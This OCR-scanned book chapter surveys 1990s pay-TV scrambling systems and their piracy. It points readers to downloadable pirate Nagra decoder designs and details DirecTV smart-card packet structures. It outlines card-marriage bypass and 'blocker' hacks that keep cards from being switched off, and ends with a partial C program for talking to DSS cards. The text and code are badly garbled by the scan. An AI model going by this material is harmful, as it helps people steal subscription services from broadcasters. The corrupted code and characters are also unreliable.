Cryptovision 


While the Cryptovision system has not been used widely on satellite, it is 
one of the more widely used digital scrambling systems in use on cablenets 
throughout Europe. It is mainly used in Scandinavia and Ireland. 


Developed in the late eighties as a more secure scrambling system, it took 
advantage of the digital video techniques that were becoming affordable at 
that time. 


Unlike many of the systems of that era, it has not been widely pirated. This 
is due mainly to the relatively secure design of its access control system 
and the fact that it is not in use on premium satellite television programming. 
However given that it is using an embedded secure microcontroller 
approach, it is not likely that the system would withstand a concerted attack. 


The system was originally manufactured by Tandberg. Tandberg have been 
associated with pay television systems for a long time and they were among 
the first to launch MAC encoders and decoders. The newer decoder models 
are manufactured by PACE. 


It is currently in used on the British Services Channel (SSVC) that 
broadcasts via the Intelsat at 27.5 Degrees West. At first glance many 
expected the channel to be using the VideoCrypt system. This mistake 
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Cryptovision Decoder Architecture 
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arose from the fact that the system uses the same basic technique as the 
VideoCrypt system though the access control is totally different. 


In Ireland, the system is the scrambling system in use on the Cablelink 
cable and MMDS nets. This would mean that it has the potential to be used 
by at least 400,000 users. However the take up of the premium rate 
programming on Cablelink has been relatively poor. The channel that the 
users find most attractive is Sky Sports. It is generally a more logical thing 
for users to get their premium programming via satellite and the terrestrial 
channels via cable. 


Cablelink does not scramble all of the channels on their networks, preferring 
instead to only scramble the premium movie and sports channels. The 
premium channels are already available via satellite anyway. However this 
may change in the next few years as some clueless money grubbing 
financial consultant may convince them to scramble all channels. Of course 
if they do this then that would mean that every home on a Cablelink net 
would have a decoder and each decoder would be a potential pirate 
decoder. 


Video Scrambling 


The technique used in the Cryptovision system is "Cut And Rotate”. The line 
video is sectioned and cut, then rotated about the cut point. The sample rate 
is higher than the VideoCrypt system and as a result the quality of the 
descrambled picture is somewhat better. 


The cutpoint in each line is masked effectively so that there is no transient 
at the point. One of the first attempts at hacking the VideoCrypt system 
used an inductor to accentuate the cutpoint. With masking this cutpoint 
disappears. Apparently the masking process involves a form of oversam- 
pling where the sample windows are longer than is required. 


The original specification used Digit 2000 series ADCs and DACs. It is now 
believed that they would use the TDA8702 and the TDA8703 ICs. The 
sampling frequency is 17.73 MHz or four times the PAL colour subcarrier 
frequency. This gives an improved picture quality. 


Like the VideoCrypt system, there are 256 cutpoints each line. This is from 
a total of 921 samples. Some of the samples are not used. This makes it 
harder to detect the cutpoints in the scrambled video. 
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The Access Control System 


The access control system is designed to be flexible in that it can support a 
number of methods ranging from over the air addressing to smart cards. 


The system, as used in Ireland and Scandinavia, uses the over the air 
control with the embedded secure microcontroller. However there are some 
questions as to whether the secure microcontroller is indeed secure. 


Apparently the system microcontroller is an 8051 type. This means that the 
hacks covered elsewhere in the book may allow this chip to be popped. 
Indeed there are rumours that this is exactly what happened with a hack on 
this system in Ireland. However the information on the hack suggests that it 
was possible to turn on channels. At the moment, there is not a sufficient 
number of decoders to justify the risks of modifying them. Cable and MMDS 
piracy in Ireland is a serious offence and anyone modifying cable or MMDS 
decoders in this manner would be running the risk of a £20000 fine. 


Some of the decoders have an EEPROM. At this time it is not known if this 
EEPROM holds any access control data such as the tiering or subscriber 
number. If indeed it does hold such data, then the possibility of a hack on 
this aspect may exist. This would be a particularly devastating hack as it 
might be applied to all official decoders. It may of course just hold data on 
the shifts for cutpoint masking. 


According to some reports the decoders in operation also use a 68301 as 
their main secure microcontroller though this has not been confirmed. If this 
is indeed the case, the decoder is using a typical twin microcontroller 
approach. However this chip may not be secure as others, typically the 
68705 and the 68HC11 were regarded by some as being secure and were 
subsequently hacked. 


The rather confused situation on just what microcontrollers the decoder 
uses may be attributed to the fact that there are two designs on the market. 
The original design was manufactured in Ireland. A later design is currently 
being manufactured by PACE. 


The vertical blanking interval carries the necessary crypto data and 
validation levels in an encrypted format. The data is virtually the same as 
teletext though it does not use the teletext lines. The use of a teletext like 
data format enables the use of cheap teletext ICs. 


It is possible for the headend user to switch on decoders over the air. It is 
this facility that makes the piracy on the system so difficult. It appears that 
piracy on this system, while being difficult, is not impossible. However the 
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fact that the main source for the decoders is the cable or MMDS company 
would imply that the purchaser or user of the decoder would be recorded. 


It is not definitely known what crypto system is used to encode the over the 
air data but it is possible that it is a DES variant. This would mean that an 
approach based on hacking the key by brute force would be tricky if not 
totally uneconomical. Even in the United States where the VideoCipher 
system uses the DES algorithm, the algorithm itself has not been reversed. 
There was a weak link in the access control section of that system that was 
exploited by hackers. Cryptovision have examined that hacks on VideoCi- 
pher and have no doubt hardened their system against a similar hack. 


However given the advances in hacking techniques and knowledge over the 
last few years, this system is clearly at risk. The embedded secure 
microcontroller principle has been completely discredited. A hack on this 
system would be very serious in that all of the decoders in the market would 
have to be upgraded. At the moment, with the sporadic use of the system 
on premium channels only, this would not be difficult. However if the hack 
reaches the market in a few years time when all channels are scrambled, 
then it will be a major problem for Cablelink. 


Should a widespread hack on this system occur, it will be a hack based on 
modifying the access control data. The video scrambling system is resilient 
enough to be secure for at least another year or so. 


The slow pace of advances in cable based systems will, inevitably, work 
against the security of this system. The reason for this is that while the 
technology used on the cable system remains comparatively static, the 
techniques of the hackers advance. In the end, Cablelink and other users of 
this system may well be left relying on the good nature of their subscribers 
and the strengths of the iocal cable piracy legislation. 


Audio Scrambling 


There is an audio scrambling facility on the Cryptovision decoders though it 
has not yet been used. There are apparently a number of options and the 
following have been mentioned: encrypted adaptive delta modulation, 
encrypted NICAM and spectrum inversion. 


Using audio scrambling would drive up the cost per unit of the decoders. 
Such a price increase would not be attractive to the small cable television 
companies interested in using the system. The result is that the standard 
implementation of the system is video scrambling only. 
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Digicrypt 
The Digicrypt system started out as the Sat-Tel VideoCode system. DCE 


took over the business interests of Sat-Tel when Sat-Tel liquidated. 
VideoCode was one of the main developments. 


The system was a joint development between Zenith (USA) and Sat-Tel / 
DCE. Zenith provided the over the air access control system and software 
and the hardware was developed by Sat Tel. It had been demonstrated at 
the International Broadcasting Convention 1990 and at various Cable And 
Satellite Shows. There have been no reports of the system actually being 
deployed yet. 


Video Scrambling 


There are two techniques used in the Digicrypt; line delay and line shuffle. 
The line delay appeared on demonstration to be a single unit delay. The 
demonstration in question was at the IBC. This facility is not mentioned in 
the Digicrypt literature issued by DCE. There are two possibilities. Either the 
facility has been dropped or it is a reserve facility. Judging from the amount 
of critical information given in the literature it is a reserve facility. It would 
also follow that DCE appears to be new to the signal security business. The 
literature contains very little of the generalities used on other system 
brochures. 


The line shuffle used is either a 32 line shuffle or a 128 line shuffle. With this 
low line count, the shuffle type is probably the sliding bar type. 


The video decoder architecture would be similar to most other line shuffle 
based decoders. The main difference would be in the access control 
section. This could be an outboard provided by Zenith and would, if this was 
the case, be housed in a pluggable module similar to the BSB EuroCypher 
ACM. Alternatively, since Zenith were involved from such an early stage, the 
access control section could be part of the actual main PCB. 


Audio Scrambling 


The audio scrambling used is the same as that used by BBC on the Intelsat 
at 27.5 Degrees West when they were scrambling in SAVE. After all, 
Sat-Tel manufactured those descramblers and the audio scrambling was 
developed by Sat-Tel. 


Now for the critical data. The audio scrambling system, according to the 
data sheet is an upward spectrum shift. The range of the spectrum shift is 
from 170 Hz to 3.1 KHz. In other press releases included in the same folder, 
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they state that the AudioCode system is capable of 12 different frequency 
shifts. 


Access Control 


The access control system used by Digicrypt is an over the air type. Four 
lines of the VBI are used to transmit the addressing data. The system can 
address up to 9000 decoders per minute. 


The number of decoders that can be addressed on one system is 16.7 
million. The tier structure is 256 levels wide. 


Hacks 


Since this system has not been deployed, this would be a hypothetical hack. 
The video scrambling is too secure to hack and obviously is not the weak 
point. The weak point would be found in the access control system to 
descrambler interface. 


Most of the circuitry would be ASICed to counter such a hack. There is the 
possibility that the Zenith system would be related to previous versions in 
the United States. Therefore a comparison of the systems would be in 
order. If there is a great enough use of the system then, the ASICed areas 
will be reverse engineered. 


The Nokia LS256 


The Nokia LS256 system is currently in use on satellite by the Italian 
hardcore porn channel Satisfaction Club TV. It is also used sporadically on 
cablenets through out Europe. 


This system is another line shuffle system and it has remained secure due 
to lack of interest. It is believed that the system also uses a sliding bar 
shuffle. Much of the operation of this system would be similar to the 
DigiCrypt system described previously. This system is also based on the 
Embedded Secure Microcontroller principle. 


The fact that this system is not in widespread use has protected it against 
any real attack by hackers and pirates. Of course porn channels are always 
prime targets for hackers but at the moment there are just too many other 
channels that are more easily hacked to justify going after this system. 


This system has received good recommendations from MMDS networks 
using the system in Italy. 
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Nagra Kudelski Syster 


The Syster system was developed to replace the totally hacked Discret 
system. Canal Plus run the biggest network of channels in Europe and in 
France alone have over three million subscribers. Even though piracy is 
very much illegal, it has not completely deterred people from using pirate 
descramblers. 


The actual scrambling system was created by Nagra Kudelski of Switzer- 
land. The decoders are manufactured by Eurodec. Eurodec is jointly owned 
by Canal Plus and Sagem. 


Most hackers refer to the system as the Nagra Kudelski Syster system or 
Nagravision or just as Nagra. One of the reasons for this appears to be that 
the spelling of Syster looks like the spelling used for the name of a heavy 
metal band. Of course the actual name could have been a joke by the 
system developers. It is a real head banger to hack. 


The actual origin of the Syster seems to be from the French for SYSteme 
TERrestrial. As it is now used on satellite as well, it seems to be more often 
referred to as Nagra. This is a bit confusing, especially for hackers in the 
USA. Nagra supplied the encryption overlay for some of the newer digital 
services. 


To date the system has been used on Canal Plus, Premiere and Canal Plus 
Espanga. Teleclub has also changed to the system. It has effectively 
become the de-facto German language scrambling system. The fact that 
Canal Plus in France are also using it makes it the most widely used system 
in Europe. According to sources, the system is being considered by the 
European Broadcasting Union for use on its newsfeed network but then the 
EBU have been considering using a scrambling system for the last few 
years and nothing has happened. 


Unlike other systems, there appears to be a dearth of IRDs. In fact 
according to a few sources there are no integrated receiver decoders for 
Syster. The actual distribution of the decoders also appears to be 
controlled. This is one of the strengths of the system. It allows the 
programme provider to maintain control over the system. When IRDs are 
allowed then the programme provider loses control and Grey Market Piracy 
becomes a serious problem. The best illustration of this fact lies in what 
happened with VideoCrypt and Sky. 
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The Video Scrambling 


The video scrambling is the main strength of the Nagra system. It uses line 
shuffle scrambling. This makes the system effectively transparent in that it 
can be used on satellite and on cable. 


The line shuffle technique has two forms. The fixed form is where the field is 
broken up into a number of bars having the same number of lines. The 
shuffle action takes place within the confines of the bar. 


The second form, the sliding bar is the more secure form. Instead of the bar 
appearing at fixed positions in each field, the position of the bars change 
from field to field. This reduces the chances of success for a correlation 
hack that samples and compares fields. 


The video descrambling process is, like most line shuffle systems, ASIC 
based. It is perhaps one of the more complex ASICs used in a decoder of 
that era. To date it has not been reverse-engineered. 


The video descrambling is based on a TDA8708 Video Analog to Digital 
Converter and a TDA8702 Digital to Analogue Converter. The actual 
descrambling process is handled by the custom microcontroller/ASIC. 


The off-air video is filtered and clamped before being fed to the ADC. The 
digital scrambled video is then fed to the ASIC which stores it in RAM. The 
ASIC then clocks the video out of the RAM in the correct order to the DAC 
strip where it is converted back to analogue and filtered before being routed 
to the decoders SCART. 


The above explanation is a simplified one. The operation of the official 
decoder is complex as the design is a multi-microcontroller one. 


The Access Control System 


The access control system on Syster is a dual system. It uses over the air 
addressing in addition to a smart card or rather smart key. The carrier of the 
detachable secure microcontroller is key shaped. It is referred to as the 
“Key” on the advertising brochures. 


The Key is reprogrammable over the air and is initialised when the 
subscriber is authorised. Apparently all Syster decoders have to be 
authorised over the air. The subscriber has to request the authorisation 
centre to authorise the decoder. 


The over the air addressing is carried in the VBI. It has a fast data clock and 
is believed to be in the region of 4 MHz. This would give the system a fast 
subscriber update speed. 
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The fact that the Key has to be authorised in the decoder would seem to 
indicate that the decoder would have the subscribers identity code 
implanted. This would allow for Key matching and any authorised decoder 
being shipped outside the copyright area could be traced, if found, to a 
subscription. 


The microcontroller used in the Nagra key is an ST16F44 series smart card 
microcontroller. The microcontroller is a relatively old one and liable to 
reverse-engineering. There have been rumours of pirate smart cards for the 
system. However most of these rumours turned out to be ill-founded. The 
problem for hackers and pirates over the last few years has been that the 
amount of decoders in free circulation has not been enough to warrant the 
hack. 


The possibility of hacking the Nagra system in the primary markets has 
been considered too risky by many of the major pirates, especially when 
they are in those primary markets. They had to consider the hacking of the 
Nagra system in light of the money that they were making from the piracy of 
the D2-MAC EuroCrypt channels and the Sky VideoCrypt channels. 
However this has not deterred the pirates in jurisdictions outside of those 
primary markets selling into them. The pirate Nagra SECAM decoder is 
selling well at the moment although it is not known how many of the 
decoders are ending up in the primary market of France. 


The one thing that Nagra has proved is that the controlled access to 
decoders is essential to maintaining a secure system. This is of course an 
alien concept to the marketing executive who would rather see the decoders 
on open sale. For the best examples of what happens when the decoders 
are on open sale you have only got to look at the piracy problems of the 
D2-MAC EuroCrypt channels and the VideoCrypt channels. But even all that 
did not stop the Nagra system from being hacked. The hack is a direct 
assault on the video scrambling technique. Of course it was not feasible 
economically or technologically until recently. 


e Where To Obtain Files To Build A Pirate 
Nagra SECAM Decoder 


The pirate Nagra SECAM decoder designs and programs have been posted 
on most BBSes dealing with satellite television. The full PCB patterns, 
component listings and ROM and MACH130 JEDEC listings were posted 
on the www.paranoia.com/-defiant website. These files are also accessible 
on its two mirror sites, one of which is www.eurosat.com. 
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The DirecTv (VideoGuard) System 


The news that the DirecTv system was hacked shocked nobody except the 
fools who had convinced themselves that it was secure. Not even News 
Datacom were convinced that it would withstand a concerted attack. This 
was a hard won bit of experience. Of course News Datacom emphasised 
that the security element, the smart card, could be replaced in the event of a 
hack. They also mentioned the individual cost of the cards ranging from $5 
to $20. Of course when you extrapolate this cost to the cost of a complete 
new card issue it works out to between $5 Million and $30 Million not to 
mention the logistical cost of implementing a new issue. So much for the 
cheap replacable security element! 


It was almost as if the DirecTv system was doomed from the start. The 
more experienced amongst us knew it the minute that we found out that 
News Datacom were supplying the security overlay for the system. Perhaps 
it does sound like a cynical reaction but you have to remember that the 
VideoCrypt system had been hacked to pieces here in Europe and there 
was little if anything that News Datacom were able to do to prevent it. The 
DirecTv system is also referred to as the VideoGuard system. The name is 
a somewhat welcome departure to the endless flood of “crypt names. 
However just changing the name did not mean that the system was going to 
remain secure. 


You have got to wonder at the kind of mind that would put a patent number 
on a smart card. It is just like telling a burglar what kind of lock your door 
uses. And yet this is exactly what has happened with the DSS card. The text 
that appears on the card is as follows: 


“This card is the property of News Datacom Ltd. and must be returned 
upon request. Incorporates VideoGuard ™ security system. Provided for 
reception of authorized 101 W longitude satellite services. Protected by 
U.S Patent 4,748,668, and others. " 


That patent referred to on the smart card is the Fiat Shamir Zero Knowledge 
Test. It is an authentication algorithm that the decoder runs to see that the 
smart card inserted is a genuine smart card. The same authentication 
algorithm was used in the analog VideoCrypt system in Europe - and 
defeated. It was not exactly the best start for a new system. 


The authentication algorithm was compromised by the fact that the data that 
was intended to remain secure did not. Therefore a hacker with an 
understanding of how the algorithm worked could easily fake the correct 
responses. This trick had been learned by hackers in Europe with the 
VideoCrypt-l| system where the ZKT had more significance than in 
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VideoCrypt-1. In the VideoCrypt-1 system, the ZKT had only been used for 
authentication. In the VideoCrypt-ll system, the results of the ZKT had been 
EXORed with the results of the hashing algorithm to give the correct seed 
result. 


Of course things then proceeded from downhill to subterranean. The 
rumours of the hack on the DSS card started as soon as the 09 card was 
hacked in Europe. The smart card that News Datacom had used for the 09 
in Europe was the same as that used for the first issue DSS card and the 
VideoCrypt-Il card. 


The roots of the hack on the DirecTv system lie in the ruins of the Sky 07 
and 09 cards. Out of the knowledge gained in these hacks came the bones 
for the DirecTv hack. 


In Europe, the VideoCrypt system, using the issue 07 card, was hacked. 
The full source code of the hack had been distributed freely on the Internet 
and via BBSes. The Digital Satellite System was preparing for launch in the 
USA. It was gut wrenching time for the executives in DSS. The common 
element between Europe and the US was News Datacom. The DSS 
executives were worried about the security of their new system. They, and 
no doubt the hackers and pirates, were wondering if what happened in 
Europe would happen in the US? 


Slowly but surely the press barrage started. The satellite television trade 
press began to run articles about the new DSS system. They were, in 
hacker terms, content free text. The majority of these articles were written 
by clueless people without any knowledge of what really happened in 
Europe. One article in particular stated that VideoCrypt had been unhacked 
since its introduction in Europe in 1989. Yeah right! And the 500,000 Pirate 
VideoCrypt smart cards and the Omigod emulator programs did not exist. It 
was a replay of what had happened in Europe - the puff pieces in the trade 
press and the inevitable hacks. 


Some of the quotes were stupid in the extreme. One memorable one 
seemed to put forth the argument that if people did not know about the 
piracy on the system then it was not much of a problem. It was considered 
by some that Darwin may have been wrong as DirecTv executives seemed 
to have evolved from ostriches. 


Well the 500,000 pirate VideoCrypt cards were very real and they forced 
Sky to issue their new card ten months ahead of schedule. There was an 
even greater problem. The 08 card they had planned to launch was almost 
identical to the hacked 07 card. Instead they had to go for the 09 card. 
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The 09 Sky card was different from the 07 in two major ways. It had a 
different architecture and it had a very different algorithm. Sky started to 
distribute this new card in February 1994 but they did not switch over to the 
card until 18th May 1994. That day is known as Dark Wednesday by 
European hackers. 


The connection here is the timing. It would have been very convenient for 
News Datacom to draw heavily on the Sky 09 card for the new DSS card. 
Most of the ROM routines could have been easily adapted for the new 
system. The main changes would of course have been in the EEPROM. 
The EEPROM of the smart card is the area that contains the main 
cryptographical routines. 


The operation to pop the 09 Sky card in Europe took a few months. It 
involved completely reverse engineering the smart card. Some preliminary 
code was sold in June 1994 at an auction in London. It was a start but it took 
a further four months before the system was totally compromised. Perhaps 
the most important part of the operation was the discovery of a back door in 
the smart card's code. 


The current theory on the DirecTv card is that it draws heavily on the 07 Sky 
card and on the VideoCrypt-ll card. It would not be unthinkable that the 
algorithm in the card uses the same tricks as proved successful in the 
VideoCrypt-Il card, primarily the integration of the ZKT authentication with 
the seed generation. The data rate of the the DirecTv card also indicates 
that the faster data rate (38K4) of the VideoCrypt-ll card has been 
employed. 


The DIREC Program 


Acknowledgement: Thanks To Peter Pan For Routines And Comments 


The program given here for examining the card has been tested with DSS 
cards and works well. No doubt other programmes will become available 
within the next few months. 


The DIREC program works with the Phoenix interfaces given in Chapter 4. 
There are commercial versions of these interfaces available and Chapter 4 
also details one of the more versatile models. In the US, an interface is 
available from Scrambling News. 


The DIREC program is based on the DECOEM.C program developed by 
Markus Kuhn to emulate the action of the VideoCrypt decoder/IRD. The 
version here allows the PC to emulate a DSS IRD and talk to a legitimate 
DSS card or indeed a pirate DSS card. 
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The DSS card is initialised at a baudrate of 9600 Baud. After initialising, it 
switches up to the faster rate of 38400 Baud for the data transfer. This 
means that it can send and receive data at a faster rate than the 07 or 09 
Sky card. In this respect it mirrors the development of the VideoCrypt-ll card 
here in Europe. 


As it stands, the program will read three packets from the card; the ATR, the 
58h packet and the 2Ah packet. These are some of the most important 
packets in the system as they identify the card, the IRD and the channel 
subscription details. 


The program was written in C and has been successfully compiled with 
Borland C. The procedure is to create a project file called DIREC.PRJ, add 
the DIREC.C and then add ASYNC.OBJ. It is then a simple matter to 
compile the program. The file, including the object file and the compiled 
version are available from: 


http://www.iol.ie/-kooltek/directv 
http: //ww.hackwatch.com/~kooltek/directv 


Naturally the files will also be available via the BBSes and all good WWW 
and FTP sites. 


Using the framework of this program it is possible to create a program that 
can be used to test cards with various packets. Of course to create a 
Phoenix type program, a working hash function would be required. However 
since the card addressing system seems to be almost entirely in the clear, it 
may well be possible to create a Blocker type program that will examine 
each of the 42 packets for the relevant addressing data for the card. 


This would be a rather simplistic hack though given the fact that the card 
roughly of the same era as the 07 Sky card such a hack may well be 
possible. 


The 07 Sky card did not encrypt the over the air authorisation and 
deauthorisation data, namely the instructions and the card numbers. This 
was a feature of the 09 сага and also the VideoCrypt-Il card. If the 42h 
packet is indeed the workhorse packet, then if this packet can be examined 
for the relevant turn-on or kill signals and the card identification data, then a 
blocker is possible. The blocker device, based on the Genesis/Blockers 
used on VideoCrypt would read the card identification data from the 58h and 
2Ah packets and compare the 42h packet data to the identification data. 
Then if the card data is contained in the 42h packet, the packet is dropped 
before it reaches the card. 
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This is a rather simplistic hack. It may not work as News Datacom may have 
chained the 42h packets. Chaining means that both the relevant 42h packet 
and the relevant seed generation data packet (probably the 40h packet) are 
required for the seed generation. However in the past News Datacom have 
made serious mistakes and given the age of the card, (circa Sky issue 07), 
these mistakes have propagated. 


өе ATR 


The Answer To Reset tells the IRD interface how to handle the smart card, 
ie what clock frequency to use and what programming voltages and 
currents are required. (covered in detail in Chapter 4) An important aspect 
of the ATR also shows up in the 2Ah packet. The bytes 21 b0 11 show up 
there to identify the card. 


Answer To Reset: 3f 76 13 25 04 21 b0 11 4a 50 03 


The VideoGuard Card Protocol 
€ 58h (23 Bytes) 


The 58h packet contains the Fuse information and also what appears to be 
the first four bytes of the Electronic ID number. The Fuse information is byte 
00 and byte 12. The fuse data apparently identifies the state of the card. 
The values 05h or 25h indicates an active card whereas an 04h value would 
indicate a card that has been shut off. 


Bytes 01 to 04 seem to contain the four most significant bytes of the card 
Electronic ID number. This number is different from the Card Serial number 
as it seems to be used to address the card when authorising or 
deauthorising it. 


58h Packet Structure 
Byte 00: Fuse Data 00 
Bytes 01 to 04: Four Most Significant Bytes Card ID 
Byte 05: Card Issue Number (01) 
Bytes 06 to 11: ?? 
Byte 12: Fuse Data 01 
Bytes 13 to 23: ?? 
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e 2Ah (119 Bytes) 


This packet conveys most of the critical information about the card to the 
decoder. The breakdown of the packet is given below. By modifying the 
results of this packet, it may well be possible to allow the card to be used in 
other IRDs. 


2Ah Packet Structure 
Byte 00: Fuse Data 00 
Bytes 01 to 03: Card Issue. Typically 21h BOh 11h From ATR 
Bytes 04 to 11: Card Serial Number 
Bytes 12 to 26: Electronic ID 
Bytes 27 to 54: IRD Box ID 
Bytes 55 to 118: Channel Subscriptions Details 
The Electronic ID number of the card, is incorporated in the Electronic ID 


section. It is five bytes long. This is the number used by DSS to address the 
cards. 


The IRD Box ID contains the details of the IRD that the card was used in. In 
effect, the cards in the DirecTv system are married to specific IRDs. 
EXORing the first four bytes of the Electronic ID with the IRD Box ID 
produces the correct Box Number. This is so that a card cannot be used in 
more than one IRD. This could also mean that the first four bytes of the 
Electronic ID are EXORed with bytes 01 to 04 of the 58h packet. There is 
the possibility of a simple hack that will allow a card to be used in more than 
one IRD. 


Other Packets 


A number of other packets have been identified from logs. While this list is 
not complete, it is a start in understanding the DirecTv system protocol. 
Other aspects such as the use of the P bytes for signaling make the 
protocol more advanced than that used on the VideoCrypt system here in 
Europe. 


As the logs are somewhat limited, extrapolations of the functions of each 
packet have had to be made. It is probable that these will be revised when 
more data is available. 
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ө 4Ch (9 Bytes) 


This packet is believed by some North American sources to be the card 
serial number. However the fact that the card serial number is present in the 
2A packet may indicate that this is some other form of identification 


e 40h (25 Bytes) 


This packet is possibly the data to calculate the seed. It is channel based 
and begins with 09h. This seems to be the flag for a packet containing 
critical information such as seed data or authorisation packets. 


The packet structure seems to be standard in that each packet begins with 
09h. Other elements seem to be the channel identifier, the programme 
identifier and a clock. The last five bytes appear to be some form of hash 
signature. 


e 54h (13 Bytes) 


This packet seems to be the seed. It is a larger seed than used in the 
VideoCrypt system. The 01h byte in the second last position may indicate 
whether the seed is valid or invalid. A more likely explanation is that it 
indicates how the seed is to be integrated in the generation of the next seed. 


ә 4Ah(1 Byte) 


This packet is a single byte which appeared as 01h in the log. Given the use 
of the Fiat-Shamir ZKT in this system, it is likely that this is the Q byte in the 
process. 


ө 5Ah (8 Byte Packet , 64 Byte Packet) 


The lengths of these packets indicate that they may be part of the 
Fiat-Shamir ZKT process. Normally the ZKT would be used by the card to 
authenticate itself to the IRD or decoder. If the authentication failed then the 
IRD would shutdown. However a more logical manner of things would 
involved the ZKT being used internally in the card in the generation of the 
seed. The result of the ZKT would be EXORed against the seed output from 
the hash function. 


ө 52h (4 Bytes) 


In the log, the contents of this packet was a string of zeroes. The function 
these bytes is not yet known. 
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€  5Eh(75 Bytes) 


This packet seems to be some form of tiering structure though it was mainly 
blank. 


e  5Ch(4Bytes) 


In the log, the contents of this packet was a string of zeroes. The function 
these bytes is not yet known. 


ө 42h (31 Bytes, 44 Bytes, 18 Bytes) 


The authorisation workhorse of the system seems to be the 42h packet. 
This packet is used to address cards and authorise them or deauthorise 
them for channels or channel tiers. It has a variable length depending on the 
application. 


The card identification structure in this system would seem to be three 
tiered. There is an electronic serial number (the card ID), a card serial 
number and an embedded card number. The embedded number begins 
with a U (55h) and is followed by a set of digits. It seems that this number is 
used to individually authorise cards. Such an authorisation packet would 
include data from the card ID (the four most significant bytes), the card 
serial number, and the U number. 


Hacks On DirecTv 


The VideoGuard system suffers from the same problem that its European 
analogue variants, VideoCrypt-1 апа VideoCrypt-ll, suffered from - it is 
totally compromised. There are currently two types of hack on the system; 
the Battery card and the Phoenixed cards. 


There is a number of Battery card variants. The original one was based on 
the Dallas 5002FP. Later versions have used the Dallas 5001 and 5000 
chips as the Dallas 5002FP has been in short supply. The circuit diagram 
for the 5001 variant is given in Chapter 4. 


These cards are not user-friendly in terms of reprogramming. The North 
American battery cards do not have a keypad. Instead they have a pad 
array that allows the card to be reprogrammed by a specific programmer 
unit. All updates to the Battery cards have been in the format of new file. 
These files are labeled MAIN* where * is two digits referring to the release 
version. 


The fact that these files are encrypted according to the specific card means 
that they can be safely distributed via the internet and the BBSes. Of course 
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this uncontrolled update path has led to some interesting development. One 
such file distributed on the rec.video.satellite.dbs newsgroup was infected 
with a virus. 


The Phoenixed cards are a more recent development. These are official 
DSS smart cards that have been activated using a Phoenix program. The 
cards are referred to as Plastic which is something of a misnomer. However 
these reprogrammed cards are more of a threat to DirecTv as they 
constitute a direct assault on the subscriber management system. 


There are two other types of hack that are feasible; a SEASON hack and a 
Blocker hack. The SEASON hack is perhaps likely towards the absolute 
end of the DSS 01 card issue. Such a hack would run on PCs and perhaps 
MACs and would be in the same format as the Sky and D2-MAC SEASON 
hacks in Europe. In fact some of the same source code, specifically the 
communications routines could be reused. 


The Blocker hack is perhaps of a similar threat level as the Phoenixed 
cards. It allows the lifetime of the official card to be extended and prevents 
the card from being turned off by the DSS subscriber management system. 
The bones of this hack have been outlined earlier and the main operation of 
this type of hack has been covered in the VideoCrypt section of the chapter. 


The PIC16C84 source code for the 09 Sky blockers is available on the 
WWW and FTP sites listed in Chapter 5. This code would of course have to 
be modified to read the different packets and operate at a higher baudrate. 


Naturally this Blocker hack is currently just a hypothetical one. There is only 
one way to test it and being on the other side of the Atlantic, that is difficult. 
If News Datacom have made the mistake of not chaining the 42h, 40h and 
54h packets then there is no reason why this hack should not work. Of 
course if News Datacom were clever and integrated nanocommands into 
the VideoGuard system, this hack would suffer the same fate as the Sky 
Genesis Blocker hack. 
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/* 
* DecoEm -- Videocrypt decoder emulator for DOS. 
* DSS IRD Emulator 
* 
* This software demonstrates, how a PC can communicate 
* with a Videocrypt smartcard over the serial port. Тһе 
* hardware required is the PCcard adapter as described in 
* ADAPTER. TXT. This program can also be used for building 
* software which communicates with other ISO 7816 conforming 
* smartcards that use the T=0 protocol. 
ж Markus Kuhn -- 19941121 
* 
* Modified to emulate а DSS IRD. 
* DSS Routines by Peter Pan 
* 
* European Scrambling Systems 5 - ISBN 1-873556-22-5 - Chapter 7 
* Compiles e.g. with Borland C++ 2.0, small model. 
* Link with ASYNC.0BJ as it comes with e.g. Season? 1.3. 
* 
/ 


#include <stdio.h> 

#include <stdlib.h> 

#include <ctype.h> 

#include <string.h> 

#include <time.h> 

#include <conio.h> /* for kbhit() & с1гѕсг() */ 
#include «dos.h» /* for int86() */ 

#include "async.h" 

#define CLK 3.571e6L /* CLK frequency in Hz delivered by adapter */ 
stdefine SECOND 1000000L /* one second in microseconds */ 
#define RESET ANSWER МАХ 33 


char reset answer[RESET ANSWER MAX] ; 

int reset length - 0; 

char header[5] = (0x48, 0x00, 0x00, 0x00, 0x00}; 
unsigned char msg[0x17]; /* 58h Result Array */ 
unsigned char msg2 [0x77] ; /* 2Ah Result Array */ 


/* message directions */ 
#define IN 0 /* to decoder */ 
stdefine OUT 1 /* to card */ 


/* 
* These are some delay values (microseconds) used in the program. 
* Use command line option w to modify them. 


БА 


#define DELAYS 1 

unsigned long delus [DELAYS] = { 

1000, /* wait after each outgoing byte */ 

2 

* Reverse and invert all bits in each byte of a string. 
* E.g. 10010111b (0x97) becomes 00010110b (0x16). 
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* 
/ 
void inverse(char *data, int len) { 
inti, ј; 
unsigned char c; 
for (i = 0; i < Леп; i++) { 
c=0; 
for (j =0; j < 8; j++) 
с |= C(data[i] & (1 < ])) !=0) < 7 - j); 
data[i] =~c; 
return; 
} 
/* 
* Uses a BIOS function in order to wait a specified number of 
* microseconds. This BIOS functions is only implemented in 
* ІВМ АТ compatible BIOSes (i.e., not in old PC and XT systems)! 
* The timing resolution of this function isn't really down 


* tolus on most systems, but it’s fine for our purposes. 
ap 


void wait_us (unsigned long microseconds) 


union REGS regs; 

if (microseconds == 0) return; 

regs.h.ah = 0x86; 

regs.x.cx = (int) (microseconds > 16); 
regs.x.dx = (int) (microseconds & Oxf fff) ; 
int86(0x15, &regs, &regs) ; 


return; 

} 

void activate_com(int com) 

{ 

int port, parity; 
switch (com) { 

case 1: port = COM1; break; 
case 2: port = COM2; break; 
case 3: port = COM3; break; 
case 4: port = COM4; break; 

default: 


printf("Port COM%d not available!\n”, com); 
exit(1); 


if (AsyncInit(port)) { 
printf("Can't initialize port COM%d!\n", com); 
exit(1); 

} 


AsyncHand(DTR | RTS); 

parity = (reset. answer[0] == Ox3f) ? ODD. PARITY : EVEN. PARITY; 
AsyncSet(9600, BITS. 8 | STOP. 2 | parity); 

return; 


) 
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void deactivate_com(void) 


{ 

AsyncHand(DTR | RTS); /* reset low */ 
AsyncStopO ; 

fprintf(stderr, "closed.Nn"); 

} 


/% 

* Send a string of bytes to serial port and wait for each single echo. 
* (More efficient send methods are too fast for decoder, it seems to 
* need more than 2 stop bits, so we wait between individual bytes.) 

li 

int send(char *data, int len) 


{ + : 
inti; 
char c; 
AsyncClear(); 
for (1 =0; 1 < Леп; i++) { 
с = data[i]; 
